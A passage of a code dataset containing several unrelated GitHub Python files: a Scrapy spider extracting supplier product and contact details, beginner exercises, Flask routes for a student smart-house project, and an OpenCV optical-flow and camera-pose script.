WHERE id = {}\".format(d_id_3_3)\n    try:\n        cur.execute(sql)  # run the SQL statement\n        results = cur.fetchall()  # fetch all matching records\n        # iterate over the results\n        for row in results:\n            two_level_id = row[0]\n            print('two_level_id', two_level_id)\n        # iterate over the results\n    except Exception as e:\n        raise e\n    item['two_level_id'] = two_level_id\n\n    # one_level_id = scrapy.Field()  # level-1 id\n    one_level_id = '-'\n    sql = \"SELECT parent_id FROM bus_industry_category WHERE id = {}\".format(two_level_id)\n    try:\n        cur.execute(sql)  # run the SQL statement\n        results = cur.fetchall()  # fetch all matching records\n        # iterate over the results\n        for row in results:\n            one_level_id = row[0]\n            print('one_level_id', one_level_id)\n        # iterate over the results\n    except Exception as e:\n        raise e\n    item['one_level_id'] = one_level_id\n\n    # three_level_id = scrapy.Field()  # level-3 id\n    item['three_level_id'] = d_id_3_3\n\n    # keywords = scrapy.Field()\n    keywords_list = []\n    keywords_dict = {}\n    keywords_dict['id'] = ''\n    keywords_dict['keyword'] = keywords_name_2\n    keywords_list.append(keywords_dict)\n    keywords_json = json.dumps(keywords_list)\n    item['keywords'] = keywords_json\n    print('keywords_json', keywords_json)\n\n    # imgs = scrapy.Field()\n\n    # detail = scrapy.Field()\n    html = '-'\n    res_detail_html = response.text\n    try:\n        soup = BeautifulSoup(res_detail_html, 'lxml')\n        html = str(soup.find('div', id=\"pdetail\"))\n        # print('html,,,,,,,,,,', html)\n    except:\n        print('_____')\n    # print(html)\n    item['detail'] = html\n\n    # units = scrapy.Field()\n    units = '-'\n    try:\n        # units = response.xpath('//div[@class=\"detail-right-con\"]/div[@class=\"item-row-w\"]/span[@class=\"supply-numb\"]/text()')[0].extract()\n        # units = re.findall('[\\u4e00-\\u9fa5]+', units, re.S)[0]\n        print('units', units)\n    except:\n        print('units', units)\n    print('units', units)\n    item['units'] = units\n\n    # com_name = scrapy.Field()\n    com_name = '-'\n    try:\n        com_name = response.xpath('//div[@class=\"comply-name\"]/p/a/text()')[0].extract()\n
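        # Illustrative note (editor's addition, not from the original file):\n        # '/text()' selects text nodes, so [0].extract() is the visible company name, e.g.:\n        #   Selector(text='<p><a>Acme Co</a></p>').xpath('//a/text()')[0].extract()  # 'Acme Co'\n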
        print('com_name', com_name)\n    except:\n        print(com_name)\n    item['com_name'] = com_name\n\n    # linkman = scrapy.Field()\n    linkman = '-'\n    try:\n        linkman = response.xpath('//*[@id=\"dialogCorMessage\"]/div[@class=\"p name\"]/em/text()')[0].extract()\n        linkman = re.findall('[\\u4e00-\\u9fa5]+', linkman, re.S)[0]\n        print('linkman', linkman)\n    except:\n        print(linkman)\n    item['linkman'] = linkman\n\n    # mobile = scrapy.Field()\n    mobile = '-'\n    try:\n        mobile = response.xpath('//*[@id=\"dialogCorMessage\"]//em/text()')[0].extract()\n        mobile = re.findall(r'\\d+', mobile, re.S)[0]\n        print('mobile', mobile)\n    except:\n        print(mobile)\n    item['mobile'] = mobile\n","repo_name":"kokohui/con_spider","sub_path":"慧聪网系列/慧聪网抓取/会聪网信息采集/hui_cong_wang/hui_cong_wang/spiders/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"74876353869","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\no = np.ones([4, 4], dtype=int)\no[2, 3] = 2\no[3, 1] = 6\nprint(o)\n\no = np.zeros([6, 6], dtype=float)\no[2, 3] = 2\no[3, 1] = 6\nprint(o)\n\nprint(np.arange(6))\nprint(np.arange(0, 51, 10)[:, np.newaxis])\n\nprint(np.arange(6) + np.arange(0, 51, 10)[:, np.newaxis])\n\n\n\nif __name__ == '__main__':\n    import doctest\n\n    doctest.testmod()\n","repo_name":"krajcovic/python-tests","sub_path":"scipytest/slicing.py","file_name":"slicing.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"2868386932","text":"# 1. name x and y - see if 2*x is greater than 10; if so print, else print\nx = 5\ny = 10\nif (2*x > 10):\n    print(\"#1 works!\")\nelse:\n    print(\"#1 Untrue..\")\n\n\n# 2. rename x and y - see if the length of the word dog is less than x; if so print, else print\nx = 5\ny = 10\nif len(\"dog\") < x:\n    print(\"#2 works!\")\nelse:\n    print(\"#2 Untrue..\")\n\n# 3. rename x and y - see if x to the power of 3 is greater than or equal to y and y to the power of 2 is less than 26; if so print, else print\nx = 3\ny = 5\nif (x ** 3 >= y) and (y ** 2 < 26):\n    print(\"#3 Works!\")\nelse:\n    print(\"#3 Untrue..\")\n\n
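# Illustrative note (editor's addition, not part of the assignment): 'in'\n# performs a membership test against a tuple, and string comparison is\n# case-sensitive:\n#   \"Dan\" in (\"Dan\", \"Steve\")   # True\n#   \"dan\" in (\"Dan\", \"Steve\")   # False\n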
# 4. - find Dan in the group!\nname = \"Dan\"\ngroup_one = (\"Tony\", \"Fred\", \"Jolene\")\ngroup_two = (\"Dan\", \"Steve\", \"Mary\", \"Peggy\")\ngroup_three = (\"Lisa\", \"Joe\", \"Kevin\", \"Tonya\")\nif name in group_one:\n    print(name + \" is in group one\")\nelif name in group_two:\n    print(name + \" is in group two\")\nelif name in group_three:\n    print(name + \" is in group three\")\nelse:\n    print(\"Dan is not coming\")\n\n# 5.\nheight = 66\nage = 16\nadult_permission = True\n\nif (height > 70) and (age >= 18):\n    print(\"Can ride all the roller coasters\")\nelif (height > 65) and (age >= 18):\n    print(\"Can ride moderate roller coasters\")\nelif (height > 60) and (age >= 18):\n    print(\"Can ride light roller coasters\")\nelif ((height > 50) and (age >= 18)) or ((adult_permission) and (height > 50)):\n    print(\"Can ride bumper cars\")\nelse:\n    print(\"Stick to lazy river\")\n","repo_name":"Ksheekey/RBootcamp","sub_path":"cw/03-Python/1/Activities/06-Stu_ConditionalConundrum/Unsolved/conditionals_unsolved.py","file_name":"conditionals_unsolved.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"15417312258","text":"\"\"\"\nFile: khansole_academy.py\n-------------------------\nKhansole Academy is a program that teaches users how to add by asking them to input answers for the addition of two\nrandomly generated integers between 10 and 99 inclusive. The program returns feedback based on the user's answers.\n\n\"\"\"\n\nimport random\n\n# ********************************** YOUR CODE GOES BELOW HERE *********************************************************\ncount = 1\n# counter for consecutive correct answers.\nwhile count <= 3:\n# repeat until the user gets three correct answers in a row.\n    fran_num = random.randint(10, 99)\n    # the first random variable assignment\n    sran_num = random.randint(10, 99)\n    # the second random variable assignment.\n    solution = int(fran_num + sran_num)\n    # the variable holding the sum of the two random numbers.\n    print(\"What is the answer for\", fran_num, \"+\", sran_num)\n    user_input = int(input(\"Answer:\"))\n    # this is displayed to request the user's input\n    if user_input == solution:\n        print(\"Correct!! You've gotten\", count, \"correct answer(s) in a row.\")\n        count += 1\n        # this information is displayed if the user gets the answer correct.\n
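    # Illustrative note (editor's addition, not from the original file): count\n    # is printed before the increment, so three consecutive correct answers\n    # print 1, 2, 3 and end the loop; e.g. right, right, wrong, right leaves\n    # count == 2 afterwards.\n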
    else:\n        count = 1\n        # this resets the streak counter.\n        print(\"Incorrect. The expected answer is\", solution)\n        # if the answer is wrong this information is displayed.\n","repo_name":"MbrohUno/Python_Projects","sub_path":"khansole_academy_starter.py","file_name":"khansole_academy_starter.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"38400252613","text":"from control_unit.communication.coms import app, db#, bcrypt\nfrom flask import render_template, url_for, flash, redirect, request, jsonify, json\nimport requests as req\nimport datetime\nfrom flask_login import login_user, current_user, logout_user\nimport pickle\nimport time\n#from control_unit.communication.coms.forms import RegistrationForm, LoginForm, UserInputForm\n#from control_unit.communication.coms.models import User, UserInput, SensorData\n#from ...submodules.database.database_DONE import Database\n# gui server\nurl = 'http://127.0.0.1:5000'\n\n# Smarthouse specifications\nnum_rooms = 5\n\n# Defining the home page of our site\n@app.route(\"/\") # the \"/\" sets the route to the current page\ndef home():\n\treturn render_template(\"index.html\", head=\"Smart-house\", content=\"Super awesome communication module\") # basic inline html for testing\n\n# Adding a dynamic URL, creating output based on the url\n\"\"\"\n@app.route(\"/<usr>\", methods=['GET'])\ndef user(usr):\n\tif current_user.is_authenticated:\n\t\tuser = User.query.filter_by(username=usr).first()\n\t\tuser_input = UserInput.query.filter_by(user_id=user.id).first()\n\t\treturn render_template(\"user.html\", title=usr, head=usr, user_input=user_input)\n\telse:\n\t\treturn render_template(\"index.html\", title=usr, head=usr, content=f\"Is that Faur's little {usr}-mouse?!\")\n\n
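# Illustrative sketch (editor's addition, not from the original file): Flask\n# URL converters pass path segments to the view as arguments, e.g.:\n#   @app.route(\"/hello/<name>\")\n#   def hello(name):\n#       return f\"Hi {name}\"\n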
# Adding a redirect url to troll P3-B3-209\n@app.route(\"/taber\")\ndef taber():\n\treturn \"<h1>Lol nice try hacker</h1>\"
\n\n# Redirecting from a url to another url\n@app.route(\"/admin\")\ndef admin():\n\treturn redirect(url_for(\"user\", usr=\"Admin!\"))\n\n# Creating a way to register new users\n@app.route(\"/register\", methods=['GET','POST'])\ndef register():\n\t# Check to see if the user is already logged in; if yes, redirect to the home page\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('home'))\n\tform = RegistrationForm()\n\t# If registered, swap to the home page and display a success message\n\tif form.validate_on_submit():\n\t\t# Hashing the password input\n\t\thashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n\t\t# Creating an input for the user table and committing it\n\t\tuser = User(username=form.username.data, password=hashed_password)\n\t\tdb.session.add(user)\n\t\tdb.session.commit()\n\t\tflash(f'Account created for {form.username.data}!', 'success')\n\t\treturn redirect(url_for('login'))\n\treturn render_template('register.html', title='Register', form=form)\n\n# Testing GET and POST\n@app.route(\"/login\", methods=['GET','POST'])\ndef login():\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('home'))\n\tform = LoginForm()\n\t# If login is successful, swap to the home page and display a success message\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=form.username.data).first()\n\t\t# check if the password input matches the user's password in the database\n\t\tif user and bcrypt.check_password_hash(user.password, form.password.data):\n\t\t\tlogin_user(user, remember=form.remember.data)\n\t\t\tflash(f'{user.username} has been logged in!', 'success')\n\t\t\treturn redirect(url_for('home'))\n\t\telse:\n\t\t\tflash(f'Login unsuccessful. Please check username and password', 'danger')\n\treturn render_template('login.html', title='Login', form=form)\n\n@app.route(\"/logout\")\ndef logout():\n\tif current_user.is_authenticated:\n\t\tlogout_user()\n\t\treturn redirect(url_for(\"home\"))\n\treturn redirect(url_for(\"home\"))\n\n@app.route(\"/User-<usr>\", methods=['GET','POST'])\ndef userinput(usr):\n\tform = UserInputForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=usr).first()\n\t\texists = UserInput.query.filter_by(user_id=user.id).first()\n\t\tif exists:\n\t\t\tDB\n\t\t\tUpdate user input in the database\n\n\t\t\texists.mac = form.mac.data\n\t\t\texists.work_start = form.work_start.data\n\t\t\texists.work_end = form.work_end.data\n\t\t\texists.sleep_start = form.sleep_start.data\n\t\t\texists.sleep_end = form.sleep_end.data\n\t\t\tdb.session.commit()\n\t\t\tflash(f'Data for {user.username} successfully updated!', 'success')\n\t\t\treturn redirect(url_for('home'))\n\t\telse:\n\t\t\tDB\n\t\t\tCreate new row with the new user input\n\n\t\t\tuser_input = UserInput(mac=form.mac.data, work_start=form.work_start.data, work_end=form.work_end.data, sleep_start=form.sleep_start.data, sleep_end=form.sleep_end.data, user_id=user.id)\n\t\t\tdb.session.add(user_input)\n\t\t\tdb.session.commit()\n\t\t\tflash(f'Data for {user.username} successfully created!', 'success')\n\t\t\treturn redirect(url_for('home'))\n\treturn render_template('userinput.html', title=usr, form=form)\n\"\"\"\n@app.route(\"/api/sensor/<sensor_id>\", methods=['POST'])\ndef sensor(sensor_id):\n\tif request.method == 'POST':\n\n\t\tsensor = str(sensor_id)\n\t\tsensor = sensor.replace(\"_\", \" \")\n\t\tprint(f'Coms: sensor writing: {sensor}')\n\t\tdata = request.form\n\n
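\t\t# Illustrative note (editor's addition, not from the original file): the\n\t\t# sensor posts \"nan\" as a literal string, so the branches below compare\n\t\t# strings and fall back to sentinel values (temp 99.1, hum 125), e.g.:\n\t\t#   float(\"21.5\")    # 21.5\n\t\t#   \"nan\" == \"nan\"   # True (plain string comparison, not math.isnan)\n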
\t\tif (data.get(\"temp\") != \"nan\") and (data.get(\"hum\") != \"nan\"):\n\t\t\ttemp = float(data.get(\"temp\"))\n\t\t\thum = int(float(data.get(\"hum\")))\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\telif (data.get(\"temp\") == \"nan\") and (data.get(\"hum\") == \"nan\"):\n\t\t\tprint(f'coms: received temp & hum = \"nan\" from sensor')\n\t\t\ttemp = 99.1\n\t\t\thum = 125\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\telif (data.get(\"temp\") == \"nan\"):\n\t\t\tprint(f'coms: received temp = \"nan\" from sensor')\n\t\t\ttemp = 99.1\n\t\t\thum = int(float(data.get(\"hum\")))\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\telif (data.get(\"hum\") == \"nan\"):\n\t\t\tprint(f'coms: received hum = \"nan\" from sensor')\n\t\t\ttemp = float(data.get(\"temp\"))\n\t\t\thum = 125\n\t\t\tmot = int(data.get(\"mot\"))\n\t\t\tinsertData = (sensor, temp, hum, mot)\n\t\t\tprint(f'coms: sensor data {insertData}')\n\t\t\t#db.insert_query(\"RH\", insertData)\n\n\t\tdb.insert_query(\"RH\", insertData)\n\n\t\t#------- Everything above should be commented out ------------#\n\n\t\trooms = ['Bathroom', 'Bedroom', 'Garage', 'Kitchen', 'Living room']\n\n\t\tfor idx, room in enumerate(rooms):\n\t\t\tif room == sensor:\n\t\t\t\tindex_value = idx\n\t\t\t\tbreak\n\n\t\tprint(\"Creating /dev/shm/sensorjar\")\n\t\tfilename = '/dev/shm/sensorjar'\n\n\t\twith open(filename, 'rb') as FileObject:\n\t\t\tRawData = FileObject.read()\n\t\tmotion_list = pickle.loads(RawData)\n\t\tmotion_list = motion_list[\"sensor\"]\n\t\tmotion_list[index_value] = int(data.get(\"mot\"))\n\t\tdata = {\"sensor\":motion_list}\n\t\tserialized = pickle.dumps(data)\n\t\twith open(filename, 'wb') as file_object:\n\t\t\tfile_object.write(serialized)\n\n\t\treturn 'ok', 200\n\telse:\n\t\treturn 'failed', 404\n\n@app.route(\"/api/gui/<sub>/\", methods=['GET', 'POST'])\ndef gui(sub):\n\tif sub == 'power':\n\t\tif request.method == 'GET':\n\t\t\t# ? Test me\n\t\t\t'''\n\t\t\tDB: return current status of rooms\n\t\t\t1. get all current status data\n\t\t\t2. 
format data to get only\n\t\t\t\t- room id\n\t\t\t\t- power state\n\t\t\trooms_power_state = {\n\t\t\t\t'room1': True,\n\t\t\t\t'room2': True,\n\t\t\t\t'room3': False,\n\t\t\t\t'room4': True,\n\t\t\t\t'room5': True\n\t\t\t}\n\t\t\t'''\n\n\t\t\troom_names = ['room1', 'room2', 'room3', 'room4', 'room5']\n\t\t\tGetRoomState = []\n\t\t\tGetRoomState = db.get_power_state()\n\t\t\tprint(f'Coms: GET | Database PowerState: {GetRoomState}')\n\t\t\tget_rooms_power_state = {}\n\t\t\tfor i, room in enumerate(room_names):\n\t\t\t\tif GetRoomState[i] == 1:\n\t\t\t\t\tget_rooms_power_state[room] = True\n\t\t\t\telse:\n\t\t\t\t\tget_rooms_power_state[room] = False\n\t\t\tprint(f'coms: GET | get_rooms_power_state {get_rooms_power_state}')\n\t\t\t\"\"\"\n\t\t\t#jsonify(success=True)\n\t\t\tmessage = {\n\t\t\t 'message': \"OK\",\n\t\t\t 'powerstate': get_rooms_power_state,\n\t\t\t 'status': 200\n\t\t\t}\n\t\t\tresp = jsonify(message)\n\t\t\tresp.status_code = 200\n\t\t\tresp.headers.add('Access-Control-Allow-Origin', '*')\n\t\t\t\"\"\"\n\t\t\treturn get_rooms_power_state, 200\n\n\t\telif request.method =='POST':\n\n\t\t\troom_names = ['room1', 'room2', 'room3', 'room4', 'room5']\n\t\t\treceived_rooms_power_state = {}\n\t\t\tfor i in range(5):\n\t\t\t\t#print(request.form.get(room_names[i]))\n\t\t\t\tif(request.form.get(room_names[i]) == 'True'):\n\n\t\t\t\t\treceived_rooms_power_state[room_names[i]] = True\n\t\t\t\telse:\n\t\t\t\t\treceived_rooms_power_state[room_names[i]] = False\n\t\t\tprint(f'coms: POST | received_rooms_power_state: {received_rooms_power_state}')\n\t\t\t# TODO Jarvis skal tilføjes til backend\n\t\t\t'''\n\t\t\t------------ Back End Server --------------\n\t\t\tTo Jarvis: change power-status of room(s)\n\t\t\t1. update room(s) with id from request.form['rooms']\n\t\t\t2. return success or error response\n\t\t\t3. if error respons: try to forward the cmd to Jarvis again\n\t\t\t4. 
else: return success response with cmd just applied\n\t\t\t------------ Front End Server --------------\n\t\t\t5.\n\t\t\t'''\n\t\t\tPostRoomState = []\n\t\t\tPostRoomState = db.get_power_state()\n\t\t\t#print(f'Coms: POST | Current power_state {PostRoomState}')\n\t\t\tpost_rooms_power_state = {}\n\t\t\tfor i, room in enumerate(room_names):\n\t\t\t\tif PostRoomState[i] == 1:\n\t\t\t\t\tpost_rooms_power_state[room] = True\n\t\t\t\telif PostRoomState[i] == 0:\n\t\t\t\t\tpost_rooms_power_state[room] = False\n\t\t\tprint(f'Coms: POST | post_rooms_power_state: {post_rooms_power_state}')\n\t\t\tCurrent_keys = list(post_rooms_power_state.keys())\n\t\t\tCurrent_values = list(post_rooms_power_state.values())\n\t\t\tReceived_keys = list(received_rooms_power_state.keys())\n\t\t\tReceived_values = list(received_rooms_power_state.values())\n\n\t\t\tprint(f'Coms: POST | Received_values: {Received_values}')\n\t\t\tprint(f'Coms: POST | Current_values: {Current_values}')\n\n\t\t\tdata = {}\n\t\t\tresponse_state = received_rooms_power_state\n\t\t\tcounter = 0\n\t\t\tfor i, value in enumerate(Current_values):\n\t\t\t\tif value != Received_values[i]:\n\t\t\t\t\tif Received_values[i]:\n\t\t\t\t\t\tdata[Received_keys[i]] = 1\n\t\t\t\t\t\tresponse_state[room_names[i]] = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tdata[Received_keys[i]] = 0\n\t\t\t\t\t\tresponse_state[room_names[i]] = False\n\t\t\t\t\tcounter += 1\n\n\t\t\tif counter == 5:\n\t\t\t\tprint('all(rv)', all(Received_values))\n\t\t\t\tif all(Received_values):\n\t\t\t\t\tdata = {\"All\":1}\n\t\t\t\telif not any(Received_values):\n\t\t\t\t\tdata = {\"All\":0}\n\n\t\t\t#print(data)\n\t\t\tfilename = '/dev/shm/picklejar'\n\t\t\tprint(f'Coms: Shared data to be inserted: {data}')\n\t\t\tserialized = pickle.dumps(data)\n\n\t\t\twith open(filename, 'wb') as file_object:\n\t\t\t\tfile_object.write(serialized)\n\n\t\t\t\"\"\"\n\t\t\tprint(f'Coms: POST RESPONSE | response_state {response_state}')\n\t\t\tfor i, key in enumerate(data):\n\t\t\t\tprint(f'Coms: key: {key} | value: {data[key]}')\n\t\t\t\tdb.power_room(i+1, data[key])\n\t\t\t\"\"\"\n\n\t\t\treturn response_state, 200\n\n\telif sub == 'history':\n\t\tif request.method == 'GET':\n\t\t\t# ? Test me\n\t\t\t'''\n\t\t\tDB: return room history\n\t\t\t1. get all room history data\n\t\t\t2. 
format data to get only\n\t\t\t\t- time\n\t\t\t\t- room id\n\t\t\t\t- power state\n\t\t\t\t- temperature\n\t\t\t\t- humidity\n\t\t\t'''\n\n\n\t\t\troom_data = [0 for x in range(num_rooms)]\n\t\t\tpower_data = [0 for x in range(num_rooms)]\n\t\t\troom = ['Bathroom', 'Bedroom', 'Garage', 'Kitchen', 'Living room']\n\n\t\t\tfor i, roomID in enumerate(room):\n\t\t\t\troom_data[i], power_data[i] = db.get_plot_data(roomID)\n\n\t\t\tprint(type(room_data))\n\t\t\tpower_data_parsed = []\n\t\t\tfor x in range(num_rooms):\n\t\t\t\tfor room in room_data[x]:\n\t\t\t\t\ttimestamp = room[0]\n\t\t\t\t\ttimestamp = timestamp.strftime('%d-%m, %H:%M:%S')\n\t\t\t\t\troom[0] = timestamp\n\n\t\t\t\tfor room in power_data[x]:\n\t\t\t\t\troom = list(room)\n\t\t\t\t\ttimestamp = room[0]\n\t\t\t\t\ttimestamp = timestamp.strftime('%d-%m, %H:%M:%S')\n\t\t\t\t\troom[0] = timestamp\n\t\t\t\t\tpower_data_parsed.append(room)\n\n\t\t\t#print(\"Sorted samlet room_data\")\n\t\t\t#print(room_data)\n\n\t\t\t#print(\"-------------------------\")\n\t\t\tfor x in range(num_rooms):\n\t\t\t\t#print(\"Room data:\")\n\t\t\t\t#print(room_data[x])\n\t\t\t\t#print(\"Power data:\")\n\t\t\t\t#print(power_data_parsed[x])\n\t\t\t\tfor y in range(len(power_data_parsed)):\n\t\t\t\t\troom_data[x].extend([power_data_parsed[y]])\n\t\t\tfor i in room_data:\n\t\t\t\tprint(i)\n\t\t\tfor x in range(num_rooms):\n\t\t\t\troomNum = 1\n\t\t\t\tlastTemp = 0\n\t\t\t\tlastHum = 0\n\t\t\t\tlastPower = [0 for x in range(2)]\n\t\t\t\tfor i, data in enumerate(room_data[x]):\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tif len(data) == 2:\n\t\t\t\t\t\t\tfor sensordata in room_data[x]:\n\t\t\t\t\t\t\t\tif len(sensordata) != 2:\n\t\t\t\t\t\t\t\t\tlastTemp = sensordata[1]\n\t\t\t\t\t\t\t\t\tlastHum = sensordata[2]\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor powerdata in room_data[x]:\n\t\t\t\t\t\t\t\tif len(powerdata) == 2:\n\t\t\t\t\t\t\t\t\tif powerdata[1] == 0:\n\t\t\t\t\t\t\t\t\t\tlastPower = 1\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tlastPower = 0\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif len(data) == 2:\n\t\t\t\t\t\t#print(f'Iteration {i}, power_data |> sidste temp {lastTemp}, sidste hum {lastHum}')\n\t\t\t\t\t\tdata.insert(1, (x+1))\n\t\t\t\t\t\tdata.insert(3, lastTemp)\n\t\t\t\t\t\tdata.insert(4, lastHum)\n\t\t\t\t\t\tlastPower = data[2]\n\t\t\t\t\telse:\n\t\t\t\t\t\t#print(f'Iteration {i}, room_data |> sidste power {lastPower}')\n\t\t\t\t\t\tdata.insert(1, (x+1))\n\t\t\t\t\t\tdata.insert(2, lastPower)\n\t\t\t\t\t\tlastTemp = data[3]\n\t\t\t\t\t\tlastHum = data[4]\n\n\t\t\thouse_data = []\n\t\t\tfor x in range(num_rooms):\n\t\t\t\thouse_data.extend(room_data[x])\n\n\t\t\t#print(house_data)\n\t\t\thouse_data = sorted(house_data)\n\n\t\t\t#print(\"-------------------------\")\n\t\t\t#print(\"Færdig formateret\")\n\t\t\t#print(room_data)\n\n\t\t\thouse_data_json = {\"load\":house_data}\n\t\t\tprint(house_data_json)\n\t\t\treturn house_data_json, 200\n\n\telif sub == 'settings':\n\t\tif request.method =='GET':\n\t\t\t# ? Test me\n\t\t\t'''\n\t\t\tDB: return all user data\n\t\t\t1. get all user data\n\t\t\t2. 
format user data\n\n\t\t\tFormatering af json package:\n\t\t\t-------------------------\n\t\t\ttest_user_data = {\n\t\t\t\t'user_data': [\n\t\t\t\t\t['G7:1A:Y2:4T:80:40', 8.16, 22.06],\n\t\t\t\t\t['00:1A:C2:7B:00:50', 8.15, 23.07]\n\t\t\t\t]\n\t\t\t}\n\t\t\t'''\n\n\t\t\tuser_data = db.get_user_data()\n\t\t\tif user_data:\n\t\t\t\tfor user in user_data:\n\t\t\t\t\tdel user[0]\n\n\t\t\telse:\n\t\t\t\tuser_data = ''\n\n\t\t\tuser_json = {'user_data':user_data}\n\t\t\taction = 'User updated'\n\t\t\treturn user_json, 200\n\n\t\telif request.method == 'POST':\n\t\t\t# ? Test me\n\t\t\tmac_addr = request.form['mac_addr']\n\t\t\twork_start = int(request.form['work_start'])\n\t\t\twork_end = int(request.form['work_end'])\n\t\t\tsleep_start = int(request.form['bedtime'])\n\t\t\tsleep_end = int(request.form['wakeup_time'])\n\n\t\t\t'''\n\t\t\tDB: are the post-request data the same as the database data?\n\t\t\t1. get all user data\n\t\t\t2. for each mac-address in database, check if the\n\t\t\trequest.form['mac_addr'] equal any of these\n\t\t\t3. if it doesn't: create new user\n\t\t\t4. if it does:\n\t\t\t\t5. does the other request.form info match the database data?\n\t\t\t\t6. if it doesn't: update the user/mac in database with new info\n\t\t\t\t7. if it does: don't update or add anything\n\t\t\t'''\n\t\t\tsleep_end = sleep_end/100\n\t\t\tsleep = sleep_start+sleep_end\n\t\t\twork_end = work_end/100\n\t\t\twork = work_start+work_end\n\n\t\t\tuser_data = db.get_user_data()\n\t\t\tif user_data:\n\t\t\t\tfor user in user_data:\n\t\t\t\t\tif user[1] == mac_addr:\n\t\t\t\t\t\taction = f'User {mac_addr} updated'\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\taction = f'User {mac_addr} Created'\n\t\t\telse:\n\t\t\t\taction = 'First User Created'\n\t\t\tdata = (mac_addr, work, sleep)\n\t\t\tdb.insert_query(\"UI\", data)\n\n\t\t\treturn jsonify({'action': action}), 200\n\"\"\"\n@app.route(\"/database\", methods=['GET'])\ndef database():\n\tusers = User.query.all()\n\tuserinputs = UserInput.query.all()\n\tsensordata = SensorData.query.all()\n\n\n\treturn render_template('database.html', title=\"Database\", head=\"Database\", users=users, userinputs=userinputs, sensordata=sensordata)\n\t\"\"\"\n","repo_name":"CE-CF/P3-B3-209-Aflevering","sub_path":"control_unit/communication/coms/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":15034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11064044279","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 24 19:01:10 2023\n\n@author: fip\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom corners import getCornersFromImg\n\nA = np.array([[565.37877495, 0. , 321.32942885],\n [ 0. , 565.48666909, 181.99343463],\n [ 0. , 0. , 1. 
]])\n\ndistCoefs_97f = np.array([[ 2.22609859e-01, -1.59712209e+00, -1.58796203e-03, 6.81037555e-04, 4.74766986e+00]])\nSQR_H, SQR_W = 19.7, 19.7\n\n\n\nfname = '../vids/checker_2.mp4'\ncap = cv2.VideoCapture(fname)\nplt.close('all')\n\n# params for ShiTomasi corner detection\nfeature_params = dict( maxCorners = 300,\n qualityLevel = 0.05,\n minDistance = 45,\n blockSize = 10 )\n\n# Parameters for lucas kanade optical flow\nlk_params = dict( winSize = (15, 15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\ncap.set(cv2.CAP_PROP_POS_FRAMES,800)\nret, frame = cap.read()\ncorners0, gray0 = getCornersFromImg(frame)\nframe0 = cv2.cvtColor(gray0, cv2.COLOR_GRAY2BGR)\ncv2.imwrite(\"../meta_data/frame0.jpg\", frame0)\n\ncap.set(cv2.CAP_PROP_POS_FRAMES,830)\nret, frame = cap.read()\ncorners1, gray1 = getCornersFromImg(frame)\nframe1 = cv2.cvtColor(gray1, cv2.COLOR_GRAY2BGR)\ncv2.imwrite(\"../meta_data/frame1.jpg\", frame1)\n\nfor pt in corners0:\n cv2.circle(frame0, pt.astype(int), 6, (255,0,0), 4)\nfor pt in corners1:\n cv2.circle(frame1, pt.astype(int), 6, (255,0,0), 4)\n\nplt.figure(1)\nplt.subplot(121)\nplt.imshow(frame0)\nplt.subplot(122)\nplt.imshow(frame1)\n\n\np0 = cv2.goodFeaturesToTrack(gray0, mask = None, **feature_params)\np1, st, err = cv2.calcOpticalFlowPyrLK(gray0, gray1, p0, None, **lk_params)\np1g = p1[st==1]\np0g = p0[st==1]\n\nfor i, (new, old) in enumerate(zip(p1g, p0g)):\n a, b = new.ravel()\n c, d = old.ravel()\n frame0 = cv2.line(frame0, (int(a), int(b)), (int(c), int(d)), (255,0,0), 2)\n frame0 = cv2.circle(frame0, (int(c), int(d)), 5, (0,0,255), -1)\n frame1 = cv2.circle(frame1, (int(a), int(b)), 5, (0,0,255), -1)\n\nplt.figure(2)\nplt.subplot(121)\nplt.imshow(frame0)\nplt.subplot(122)\nplt.imshow(frame1)\n\nHRES, VRES = 640, 360\n\npts_w = np.zeros((81, 3))\nfor i in range(81):\n pts_w[i, 0] = (i//9-4)*SQR_H\n pts_w[i, 1] = (i%9-4)*SQR_W\n\n\nret0, rvec0, tvec0 = cv2.solvePnP(pts_w, corners0, A, None)\nret1, rvec1, tvec1 = cv2.solvePnP(pts_w, corners1, A, None)\narr = np.hstack((rvec0, tvec0, rvec1, 